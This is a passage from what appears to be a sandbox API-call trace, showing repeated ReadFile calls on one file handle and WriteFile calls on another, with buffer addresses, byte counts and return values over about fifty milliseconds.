lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.799] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.800] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x361, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.800] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.801] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.801] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.802] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ca, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.802] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.803] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.803] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x12c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.804] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.804] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.805] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.805] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.806] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x9f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.806] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.807] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.807] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xdf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.808] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.808] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.809] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.809] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.810] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.810] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.811] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.811] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.812] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.812] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2db, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.813] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.813] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.814] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.814] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.815] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.815] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.816] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x7c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.816] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.817] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.817] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x206, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.818] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.818] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.819] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.819] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.820] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x398, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.820] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.821] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.821] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.822] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.822] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xba, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.823] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.823] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x347, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.824] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.824] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.825] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.825] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.826] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.826] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.827] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.827] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.828] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3f7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.828] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.829] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.829] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.830] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.830] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.831] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.831] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.832] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.832] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x30a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.833] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.833] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.834] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.834] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.834] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.835] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.835] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.836] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x358, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.836] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.837] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.838] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.838] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.839] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.839] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x54, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.839] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.840] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.840] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x56, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.841] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.841] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.842] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x79, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.842] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.843] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.843] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.844] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.845] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.845] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.846] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.846] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.847] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.847] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0024.848] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.848] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0024.849] ReadFile (in: 